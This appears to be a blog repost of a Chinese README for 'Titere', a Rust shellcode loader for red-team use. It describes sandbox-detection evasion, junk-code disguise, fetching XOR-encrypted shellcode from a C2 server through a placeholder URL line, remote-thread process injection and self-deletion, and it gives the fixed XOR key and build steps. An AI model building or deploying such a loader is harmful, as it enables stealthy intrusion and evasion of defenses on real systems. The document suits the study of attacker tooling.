Titere - 高级Shellcode加载器
一个集成了多种高级反检测技术的 Rust Shellcode 加载器,专为红队渗透测试设计。
🎯 核心功能
主程序 (src/main.rs) - Shellcode加载器
- 沙箱对抗:运行时间检测、用户交互检测、环境特征检测、进程检测
- 行为伪装:延迟执行、正常文件访问、多态垃圾代码、假解密操作
- Shellcode加载:远程下载、XOR解密、进程注入执行
- 自清理:执行后自删除、痕迹清理
加密工具 (encrypt_project/src/main.rs) - Shellcode加密器
- Shellcode处理:自动检测.bin文件、XOR加密处理
- 数据混淆:固定密钥加密、批量文件处理
🛠️ 技术架构
Shellcode加载流程
- 沙箱检测 - 确保在真实环境中执行
- 行为伪装 - 混淆真实意图
- 远程获取Shellcode - 从C2服务器下载加密数据
- XOR解密Shellcode - 使用固定密钥解密
- 进程注入执行 - 注入目标进程并执行
沙箱检测技术
- 系统运行时间检测
- 用户交互检测
- 环境特征检测
- 沙箱进程检测
进程注入技术
- 远程内存分配
- 写入shellcode
- 创建远程线程执行
🚀 快速开始
环境要求
- Windows 操作系统
- Rust 开发环境
编译安装
# 克隆项目
git clone https://github.com/9Insomnie/TitereV1.0.git
cd Titere
# 编译主程序
cargo build --release
# 编译加密工具
cd encrypt_project
cargo build --release
使用方法
Shellcode加载器
# 直接运行
cargo run
# 或运行编译后的可执行文件
./target/release/loader.exe
Shellcode加密器
cd encrypt_project
cargo run
🔧 配置说明
C2服务器配置
修改 src/main.rs
中的C2服务器地址:
let url = "http://your-c2-server.com:port/output.bin";
加密密钥
默认XOR密钥:[0x1A, 0x2B, 0x3C, 0x4D, 0x5E, 0x6F, 0x7A, 0x8B]
🎯 红队使用场景
- 初始访问:绕过沙箱检测,加载初始shellcode
- 权限提升:注入高权限进程,执行提权shellcode
- 横向移动:远程代码执行,进程间shellcode传播
- 持久化:隐蔽shellcode加载,维持访问
📊 技术细节
多态代码技术
- 模拟数学计算
- 模拟字符串处理
- 模拟数组操作
- 模拟时间获取
自删除技术
- 延迟3秒后删除自身文件
- 使用cmd命令执行删除操作
⚠️ 重要声明
本工具仅用于授权的红队渗透测试。使用者必须获得目标系统的明确授权,并遵守相关法律法规。作者不承担任何因非法使用而产生的法律责任。
温馨提示:本文最后更新于2025年8月3日 02:08,若内容或图片失效,请在下方留言或联系博主。